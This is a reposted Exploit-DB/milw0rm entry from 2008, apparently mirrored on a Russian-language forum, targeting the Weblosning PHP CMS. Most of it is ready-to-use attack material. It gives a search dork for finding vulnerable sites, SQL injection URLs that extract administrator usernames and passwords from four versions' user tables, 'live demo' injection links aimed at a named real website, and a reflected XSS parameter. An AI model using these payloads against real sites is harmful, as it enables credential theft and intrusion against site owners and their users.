Exploit Weblosninger 4 - Cross-Site Scripting / SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5664
Проверка EDB
  1. Пройдено
Автор
MR.SQL
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-2506 cve-2008-2505
Дата публикации
2008-05-21
Код:
################ Viva IsLaM ################
#   (sql / xss ) Multiple Vulnerabilities
#     
#   weblosning   V1, V2,V3,V4 (( index2.php id ))                              
############################################
## Script Name : Weblosning (( V1, V2,V3,V4 ))
##
## Demo :   http://www.simpelside.dk/
############################################
##
## AuTh0r: Mr.SQL
## H0ME  : WwW.PaL-HaCkEr.CoM
## Email : [email protected]
## 
############################################
##      (( V1 ::V2 :: V3 :: V4 ))
##
## D0rk :  allinurl: "index2.php" mainid
##
====>>>   SQL ::::::::

       V1  =====>>  http://www.target.dk/  index2.php?id=31&mainid=-1+union+select+1,2,3,concat_ws(0x3a3a,brugernavn,adgangskode),5,6+from+web1_brugere/*
         
       V2  =====>>  http://www.target.dk/  index2.php?id=31&mainid=-1+union+select+1,2,3,concat_ws(0x3a3a,brugernavn,adgangskode),5,6+from+web2_brugere/*
         
       V3 =====>>  http://www.target.dk/  index2.php?id=31&mainid=-1+union+select+1,2,3,concat_ws(0x3a3a,brugernavn,adgangskode),5,6+from+web3_brugere/*
          
       V4 =====>>  http://www.target.dk/  index2.php?id=31&mainid=-1+union+select+1,2,3,concat_ws(0x3a3a,brugernavn,adgangskode),5,6+from+web4_brugere/*


## Note ## plz use all exploits to have good results , the sites have difrrent versions , so you must test all tables name on targets the ,table name like this [  web1_brugere , web2_brugere , web3_brugere , web4_brugere ]  to know script version 
 

## Video How to use tables  :)       http://www.4shared.com/file/48485309/1fa3df0/weblosning.html


##  :: liVe DeM0 ::


version (1)  http://www.simpelside.dk/web1/index2.php?id=-4+union+select+1,2,concat_ws(0x3a3a,brugernavn,adgangskode),4,5,6+from+web1_brugere/*

version (2)   http://www.simpelside.dk/web2/index2.php?id=2&mainid=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3+from+web2_brugere/*

version (3)    http://www.simpelside.dk/web3/index2.php?id=-3+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3,4,5,6+from+web3_brugere/*

version (4)  http://www.simpelside.dk/web4/index2.php?id=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3,4,5,6+from+web4_brugere/*

#########################################################################################
      
====>> xss ::::::
                      http://www.target.dk/web1/result.php?search= (xss)
====>>
        EX ::::  http://www.simpelside.dk/web1/result.php?search= Viva%20Islam%20

 
#########################################################################################

<< Gr33Tz>>  (( HaCkEr-EGy )) :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH ::  (( MuslimS HaCkErS ))

#########################################################################################
                       -(:::: Geek Inj3cT0r ::::)-

# milw0rm.com [2008-05-21]
 
Источник
www.exploit-db.com

Похожие темы